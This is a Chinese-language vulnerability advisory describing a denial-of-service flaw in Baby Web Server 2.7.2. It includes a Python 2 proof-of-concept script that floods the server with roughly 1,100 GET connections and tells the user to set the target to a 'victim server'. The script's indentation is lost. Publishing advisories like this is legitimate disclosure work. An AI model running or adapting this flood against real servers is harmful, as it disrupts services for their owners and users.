漏洞起因
异常条件处理失败错误
影响系统
Pablo Software Solutions Baby Web Server 2.7.2
不受影响系统
危害
远程攻击者可以利用漏洞对系统进行拒绝服务攻击。
攻击所需条件
攻击者必须访问Baby Web Server。
漏洞信息
Pablo Software Solutions Baby Web Server是一款WEB服务程序。
Baby Web Server不正确处理用户提交的GET请求,远程攻击者可以利用漏洞对系统进行拒绝服务攻击。
测试方法
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"
厂商解决方案
目前没有解决方案提供:
http://www.pablosoftwaresolutions.com/html/baby_web_server.html
漏洞提供者
Asheesh kumar Mani Tripathi
0 条评论。